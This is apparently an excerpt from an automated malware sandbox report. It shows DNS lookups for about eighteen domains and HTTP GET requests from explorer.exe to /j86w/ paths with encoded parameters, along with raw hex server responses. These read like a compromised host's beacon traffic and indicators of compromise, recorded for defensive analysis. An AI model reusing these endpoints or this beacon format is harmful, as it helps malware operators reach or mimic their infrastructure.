                                                                                          May 25, 2022 00:39:04.502336979 CEST192.168.2.58.8.8.80x40ebStandard query (0)www.popcornpor.xyzA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:14.906707048 CEST192.168.2.58.8.8.80xb11eStandard query (0)www.heiboard.xyzA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:20.175956964 CEST192.168.2.58.8.8.80x78b5Standard query (0)www.burntkeroseneblueheelers.comA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:25.530280113 CEST192.168.2.58.8.8.80xf3daStandard query (0)www.medicaleducationbangladesh.comA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:30.921968937 CEST192.168.2.58.8.8.80x690aStandard query (0)www.lingmao08.comA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:36.068521976 CEST192.168.2.58.8.8.80xf27fStandard query (0)www.jamiebakes.netA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:41.203762054 CEST192.168.2.58.8.8.80x6497Standard query (0)www.theminercrypto.comA (IP address)IN (0x0001)

                                                                                          DNS Answers

                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                          May 25, 2022 00:37:20.655066967 CEST8.8.8.8192.168.2.50x9c12No error (0)www.deta-hedman.comdeta-hedman.comCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:37:20.655066967 CEST8.8.8.8192.168.2.50x9c12No error (0)deta-hedman.com37.97.135.188A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:30.792267084 CEST8.8.8.8192.168.2.50xefbeNo error (0)www.shantellonlineshoph.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:37:30.792267084 CEST8.8.8.8192.168.2.50xefbeNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:35.998270988 CEST8.8.8.8192.168.2.50xb745No error (0)www.heiboard.xyzheiboard.xyzCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:37:35.998270988 CEST8.8.8.8192.168.2.50xb745No error (0)heiboard.xyz34.102.136.180A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:41.340441942 CEST8.8.8.8192.168.2.50x40fcNo error (0)www.tsreaur.com165.231.150.75A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:46.798290014 CEST8.8.8.8192.168.2.50x7fd7No error (0)www.iguaym.com156.226.250.150A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:52.620114088 CEST8.8.8.8192.168.2.50xc97eNo error (0)www.funserve.clubparking.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:37:52.620114088 CEST8.8.8.8192.168.2.50xc97eNo error (0)parking.namesilo.com209.141.38.71A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:52.620114088 CEST8.8.8.8192.168.2.50xc97eNo error (0)parking.namesilo.com70.39.125.244A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:52.620114088 CEST8.8.8.8192.168.2.50xc97eNo error (0)parking.namesilo.com198.251.81.30A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:52.620114088 CEST8.8.8.8192.168.2.50xc97eNo error (0)parking.namesilo.com107.161.23.204A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:52.620114088 CEST8.8.8.8192.168.2.50xc97eNo error (0)parking.namesilo.com192.161.187.200A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:52.620114088 CEST8.8.8.8192.168.2.50xc97eNo error (0)parking.namesilo.com168.235.88.209A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:52.620114088 CEST8.8.8.8192.168.2.50xc97eNo error (0)parking.namesilo.com204.188.203.155A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:52.620114088 CEST8.8.8.8192.168.2.50xc97eNo error (0)parking.namesilo.com45.58.190.82A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:52.620114088 CEST8.8.8.8192.168.2.50xc97eNo error (0)parking.namesilo.com64.32.22.102A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:52.620114088 CEST8.8.8.8192.168.2.50xc97eNo error (0)parking.namesilo.com198.251.84.92A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:58.051512957 CEST8.8.8.8192.168.2.50x17b6No error (0)www.popcornpor.xyzparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:37:58.051512957 CEST8.8.8.8192.168.2.50x17b6No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:58.051512957 CEST8.8.8.8192.168.2.50x17b6No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:58.051512957 CEST8.8.8.8192.168.2.50x17b6No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:58.051512957 CEST8.8.8.8192.168.2.50x17b6No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:58.051512957 CEST8.8.8.8192.168.2.50x17b6No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:58.051512957 CEST8.8.8.8192.168.2.50x17b6No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:37:58.051512957 CEST8.8.8.8192.168.2.50x17b6No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:03.462830067 CEST8.8.8.8192.168.2.50x3dc1No error (0)www.expoj3.comshops.mycartpanda.comCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:38:03.462830067 CEST8.8.8.8192.168.2.50x3dc1No error (0)shops.mycartpanda.com104.16.100.51A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:03.462830067 CEST8.8.8.8192.168.2.50x3dc1No error (0)shops.mycartpanda.com104.16.99.51A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:08.696748972 CEST8.8.8.8192.168.2.50x5620No error (0)www.danilhodoekhi.comdanilhodoekhi.comCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:38:08.696748972 CEST8.8.8.8192.168.2.50x5620No error (0)danilhodoekhi.com15.197.142.173A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:08.696748972 CEST8.8.8.8192.168.2.50x5620No error (0)danilhodoekhi.com3.33.152.147A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:13.881675959 CEST8.8.8.8192.168.2.50x7c13No error (0)www.pieprop.compieprop.comCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:38:13.881675959 CEST8.8.8.8192.168.2.50x7c13No error (0)pieprop.com34.102.136.180A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:19.076489925 CEST8.8.8.8192.168.2.50x45No error (0)www.jamiebakes.netgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:38:19.076489925 CEST8.8.8.8192.168.2.50x45No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:38:19.076489925 CEST8.8.8.8192.168.2.50x45No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:24.347954988 CEST8.8.8.8192.168.2.50xe2acName error (3)www.gsibralstar1.comnonenoneA (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:29.381230116 CEST8.8.8.8192.168.2.50xd50aNo error (0)www.trustedhomebuying.comtrustedhomebuying.comCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:38:29.381230116 CEST8.8.8.8192.168.2.50xd50aNo error (0)trustedhomebuying.com38.143.25.232A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:35.116864920 CEST8.8.8.8192.168.2.50x9abfNo error (0)www.jupiter-directory.info81.171.22.6A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:38:40.293832064 CEST8.8.8.8192.168.2.50xd246No error (0)www.route112mitsubishi.comroute112mitsubishi.comCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:38:40.293832064 CEST8.8.8.8192.168.2.50xd246No error (0)route112mitsubishi.com34.102.136.180A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:04.532608032 CEST8.8.8.8192.168.2.50x40ebNo error (0)www.popcornpor.xyzparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:39:04.532608032 CEST8.8.8.8192.168.2.50x40ebNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:04.532608032 CEST8.8.8.8192.168.2.50x40ebNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:04.532608032 CEST8.8.8.8192.168.2.50x40ebNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:04.532608032 CEST8.8.8.8192.168.2.50x40ebNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:04.532608032 CEST8.8.8.8192.168.2.50x40ebNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:04.532608032 CEST8.8.8.8192.168.2.50x40ebNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:04.532608032 CEST8.8.8.8192.168.2.50x40ebNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:14.948277950 CEST8.8.8.8192.168.2.50xb11eNo error (0)www.heiboard.xyzheiboard.xyzCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:39:14.948277950 CEST8.8.8.8192.168.2.50xb11eNo error (0)heiboard.xyz34.102.136.180A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:20.203048944 CEST8.8.8.8192.168.2.50x78b5No error (0)www.burntkeroseneblueheelers.com104.21.27.132A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:20.203048944 CEST8.8.8.8192.168.2.50x78b5No error (0)www.burntkeroseneblueheelers.com172.67.142.158A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:25.557332993 CEST8.8.8.8192.168.2.50xf3daNo error (0)www.medicaleducationbangladesh.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:39:25.557332993 CEST8.8.8.8192.168.2.50xf3daNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:25.557332993 CEST8.8.8.8192.168.2.50xf3daNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:25.557332993 CEST8.8.8.8192.168.2.50xf3daNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:25.557332993 CEST8.8.8.8192.168.2.50xf3daNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:25.557332993 CEST8.8.8.8192.168.2.50xf3daNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:25.557332993 CEST8.8.8.8192.168.2.50xf3daNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:25.557332993 CEST8.8.8.8192.168.2.50xf3daNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:30.947431087 CEST8.8.8.8192.168.2.50x690aNo error (0)www.lingmao08.com172.67.219.19A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:30.947431087 CEST8.8.8.8192.168.2.50x690aNo error (0)www.lingmao08.com104.21.78.90A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:36.102147102 CEST8.8.8.8192.168.2.50xf27fNo error (0)www.jamiebakes.netgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:39:36.102147102 CEST8.8.8.8192.168.2.50xf27fNo error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                          May 25, 2022 00:39:36.102147102 CEST8.8.8.8192.168.2.50xf27fNo error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)
                                                                                          May 25, 2022 00:39:41.259789944 CEST8.8.8.8192.168.2.50x6497No error (0)www.theminercrypto.com217.160.0.206A (IP address)IN (0x0001)

                                                                                          HTTP Request Dependency Graph

                                                                                          • www.deta-hedman.com
                                                                                          • www.shantellonlineshoph.com
                                                                                          • www.heiboard.xyz
                                                                                          • www.tsreaur.com
                                                                                          • www.iguaym.com
                                                                                          • www.funserve.club
                                                                                          • www.popcornpor.xyz
                                                                                          • www.expoj3.com
                                                                                          • www.danilhodoekhi.com
                                                                                          • www.pieprop.com
                                                                                          • www.jamiebakes.net
                                                                                          • www.trustedhomebuying.com
                                                                                          • www.jupiter-directory.info
                                                                                          • www.route112mitsubishi.com
                                                                                          • www.burntkeroseneblueheelers.com
                                                                                          • www.medicaleducationbangladesh.com
                                                                                          • www.lingmao08.com
                                                                                          • www.theminercrypto.com

                                                                                          HTTP Packets

                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          0192.168.2.54979037.97.135.18880C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:37:20.692347050 CEST1305OUTGET /j86w/?r0DdqnX=Kkb0DjnINT29w7Qrg2PFxeNyGIRzhfaNNN9zf2FlHT6WK5ZN02NS1QMbiS9ATrkigRb2&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.deta-hedman.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:37:20.725965977 CEST1306INHTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx/1.18.0
                                                                                          Date: Tue, 24 May 2022 22:37:20 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 169
                                                                                          Connection: close
                                                                                          Location: https://www.deta-hedman.com/j86w/?r0DdqnX=Kkb0DjnINT29w7Qrg2PFxeNyGIRzhfaNNN9zf2FlHT6WK5ZN02NS1QMbiS9ATrkigRb2&THiL=OBZhFrvhwhfT
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0</center></body></html>


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          1192.168.2.54979123.227.38.7480C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:37:30.851277113 CEST1307OUTGET /j86w/?r0DdqnX=EvWqOpuITA36Tx+b1edEGBLtvk6gEbSmyN3aa/t6Vby44TN1y2mXcFBmC02e8zc2JU9V&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.shantellonlineshoph.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:37:30.916320086 CEST1308INHTTP/1.1 403 Forbidden
                                                                                          Date: Tue, 24 May 2022 22:37:30 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          X-Sorting-Hat-PodId: -1
                                                                                          X-Dc: gcp-europe-west1
                                                                                          X-Request-ID: a061d98a-e085-4c73-9795-9345c31a5e9f
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Permitted-Cross-Domain-Policies: none
                                                                                          X-XSS-Protection: 1; mode=block
                                                                                          X-Download-Options: noopen
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 7109842bdbbb995c-FRA
                                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 61 72 74 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 36 72 65 6d
                                                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem
                                                                                          May 25, 2022 00:37:30.916357040 CEST1310INData Raw: 7d 2e 61 63 74 69 6f 6e 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 41 39 41 39 41 39 3b 70 61 64 64 69 6e 67 3a 31 2e 32 72 65 6d 20 32 2e 35 72 65 6d 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 36 70 78 3b 74 65 78 74 2d 64 65 63
                                                                                          Data Ascii: }.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-wid
                                                                                          May 25, 2022 00:37:30.916374922 CEST1311INData Raw: 20 70 61 72 61 20 61 63 63 65 64 65 72 20 61 20 65 73 74 61 20 70 c3 a1 67 69 6e 61 20 77 65 62 22 0a 20 20 7d 2c 0a 20 20 22 6b 6f 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 ec 95 a1 ec 84 b8 ec 8a a4 ea b0 80 20 ea b1 b0 eb b6 80
                                                                                          Data Ascii: para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": " " }, "da": { "title": "Adgang ngtet", "content-title"
                                                                                          May 25, 2022 00:37:30.916393995 CEST1312INData Raw: e0 a4 9f 20 e0 a4 a4 e0 a4 95 20 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 aa e0 a5 8d e0 a4 b0 e0 a4 be e0 a4 aa e0 a5 8d e0 a4 a4 20 e0 a4 95 e0 a4 b0 e0 a4 a8 e0 a5 87 20 e0 a4 95 e0 a5 80 20 e0 a4 85 e0 a4 a8 e0 a5 81 e0 a4 ae e0
                                                                                          Data Ascii: " }, "ja": { "title": "", "content-title": "
                                                                                          May 25, 2022 00:37:30.916407108 CEST1313INData Raw: 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 69 31 38 6e 3d 22 20 2b 20 69 64 20 2b 20 22 5d 22 29 3b 0a 20 20 20 20 69 66 20 28 74 61 72 67 65 74 20 21 3d 20 75 6e 64 65 66 69 6e 65 64 29 20 7b 0a 20 20 20 20 20 20 74
                                                                                          Data Ascii: nt.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translations[id]; } } // Replace title tage document.title = translations["title"]; // Replace language tag if (t[language]) { do
                                                                                          May 25, 2022 00:37:30.916419983 CEST1313INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          10192.168.2.54980434.117.168.23380C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          May 25, 2022 00:38:19.102739096 CEST1351OUTGET /j86w/?r0DdqnX=yKTGLI+0hL2BDOWtnpkJD3ucTFHFYk4E4D+J/cKEoeBM9eHABkvZa3d9fxVWbjwcPE7R&THiL=OBZhFrvhwhfT HTTP/1.1
                                                                                          Host: www.jamiebakes.net
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          May 25, 2022 00:38:19.173266888 CEST1352INHTTP/1.1 404 Not Found
                                                                                          Date: Tue, 24 May 2022 22:38:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          x-wix-request-id: 1653431899.1131753714030379
                                                                                          Age: 0
                                                                                          Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw3
                                                                                          X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMcNxqRTGgIypykrF8CfWT6c,qquldgcFrj2n046g4RNSVCA9lUGGSSQQI3tXitet/XU=,2d58ifebGbosy5xc+FRalrqyUxiBukN8lquytXnkXGlFXGwxNtUdqEtprkiYq/wojoe2GMQJ/MdiMK4Y/vI704TLHuFpCHeD62VpQP+vkYs=,2UNV7KOq4oGjA5+PKsX47GTyisN7iVCrYEwBeRKnkmpYgeUJqUXtid+86vZww+nL,7npGRUZHWOtWoP0Si3wDp6z7IyfxLR0DvGF38ZVfcXQ=,xTu8fpDe3EKPsMR1jrheEP5GNmd0+0JRnUZi7EYUt1s=,v8/9RyiPVS5W/0J6Pu/x94tgPhpxgFctFAnNxepA8jJamMqYX3qjq1DylQmfC+fQWIHlCalF7YnfvOr2cMPpyw==
                                                                                          Vary: Accept-Encoding
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Server: Pepyaka/1.19.10
                                                                                          Via: 1.1 google
                                                                                          x-wix-google-ccm: 1
                                                                                          Connection: close
                                                                                          Data Raw: 62 39 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21
                                                                                          Data Ascii: b93 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> <!
